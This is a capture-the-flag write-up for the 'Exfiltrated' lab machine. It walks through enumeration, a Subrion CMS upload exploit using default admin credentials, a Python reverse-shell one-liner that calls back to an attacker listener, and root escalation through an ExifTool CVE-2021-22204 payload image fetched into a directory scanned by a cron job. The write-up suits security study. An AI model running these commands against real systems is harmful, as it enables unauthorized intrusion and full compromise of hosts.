Exfiltrated
Enumeration
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 09BDDB30D6AE11E854BFF82ED638542B
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 7 disallowed entries
| /backup/ /cron/? /front/ /install/ /panel/ /tmp/
|_/updates/
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://exfiltrated.offsec/
Subrion CMS 4.2.1
Default credentials - admin:admin
Subrion CMS 4.2.1 - Arbitrary File Upload
https://www.exploit-db.com/exploits/49876
Initial Access
$ python3 49876 -u http://exfiltrated.offsec/panel/ --user admin --passw admin
Got a webshell. Ran this from it to get a reverse shell (listener on 192.168.49.145:80):
export RHOST="192.168.49.145";export RPORT=80;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'
PrivEsc
www-data@exfiltrated:/tmp$ cat /etc/crontab
* * * * * root bash /opt/image-exif.sh
---
www-data@exfiltrated:/tmp$ cat /opt/image-exif.sh
#! /bin/bash
#07/06/18 A BASH script to collect EXIF metadata
echo -ne "\n metadata directory cleaned! \n\n"
IMAGES='/var/www/html/subrion/uploads'
META='/opt/metadata'
FILE=`openssl rand -hex 5`
LOGFILE="$META/$FILE"
echo -ne "\n Processing EXIF metadata now... \n\n"
ls $IMAGES | grep "jpg" | while read filename;
do
exiftool "$IMAGES/$filename" >> $LOGFILE
done
echo -ne "\n\n Processing is finished! \n\n\n"
Every minute root runs exiftool against every file in the Subrion uploads directory whose name contains "jpg". www-data can write to that directory, so a malicious image placed there gets parsed by exiftool as root.
ExifTool Version Number : 11.88
exiftool 11.88 -> CVE-2021-22204 (ExifTool DjVu metadata RCE)
https://blog.convisoappsec.com/en/a-case-study-on-cve-2021-22204-exiftool-rce/
CVE-2021-22204 can be triggered with a perfectly valid image (jpg, tiff, mp4 and many more), leading to arbitrary code execution. Improper neutralization of user data in the DjVu file format in ExifTool versions 7.44 through 12.23 (fixed in 12.24) allows arbitrary code execution when parsing the malicious image. 11.88 on the target is in range.
https://github.com/convisolabs/CVE-2021-22204-exiftool
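Before building the payload it is worth confirming the target's version actually falls in the affected range, since a host on 12.24 or later will just log the image and never call back. The following is an added example, not part of the original writeup or the convisolabs repo; it parses the "ExifTool Version Number" line seen above and checks it against 7.44 <= version < 12.24. The sample output line is constructed, and exiftool minor versions are assumed to be two digits (as they are in practice).

```sh
#!/bin/sh
# Added example: is this exiftool version in the CVE-2021-22204 range?
# Affected: 7.44 <= version < 12.24 (12.24 contains the fix).

# Convert "MAJOR.MINOR" to an integer MAJOR*100+MINOR so versions compare
# numerically ("7.44" -> 744, "11.88" -> 1188, "12.24" -> 1224).
ver_to_int() {
    major=${1%%.*}
    minor=${1#*.}
    # exiftool minors are two digits; normalise anyway in case of "12.4"
    case ${#minor} in
        1) minor="${minor}0" ;;
        2) ;;
        *) minor=$(printf '%s' "$minor" | cut -c1-2) ;;
    esac
    echo $(( major * 100 + minor ))
}

# Exit status 0 when the version is affected by CVE-2021-22204.
exiftool_vulnerable() {
    v=$(ver_to_int "$1")
    lo=$(ver_to_int 7.44)
    hi=$(ver_to_int 12.24)
    if [ "$v" -ge "$lo" ] && [ "$v" -lt "$hi" ]; then
        return 0
    fi
    return 1
}

# Pull the version out of exiftool's own output, e.g. the line
# "ExifTool Version Number         : 11.88" that exiftool prints for any file.
version_from_output() {
    printf '%s\n' "$1" | sed -n 's/^ExifTool Version Number *: *//p'
}

# Usage with a constructed output line matching what the target showed.
SAMPLE="ExifTool Version Number         : 11.88"
ver=$(version_from_output "$SAMPLE")
if exiftool_vulnerable "$ver"; then
    echo "exiftool $ver: affected by CVE-2021-22204"
else
    echo "exiftool $ver: not affected"
fi
```

On the target this can be fed with the output of exiftool itself; a version of 12.24 or higher means the cron job is not the way in.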
$ sudo apt install djvulibre-bin exiftool
$ git clone https://github.com/convisolabs/CVE-2021-22204-exiftool.git
$ cd CVE-2021-22204-exiftool
Change the IP and port in exploit.py to the attacker's listener, then build the payload image:
$ python3 exploit.py
Serve the resulting image.jpg over HTTP on port 80 (e.g. python3 -m http.server 80 from this directory) and start a listener on the port set in exploit.py. Then fetch the image into the directory the cron job scans:
www-data@exfiltrated:/var/www/html/subrion/uploads$ wget http://192.168.49.145/image.jpg
The name image.jpg matches the script's grep "jpg" filter, so within a minute the cron job runs exiftool on it as root and the payload connects back as root.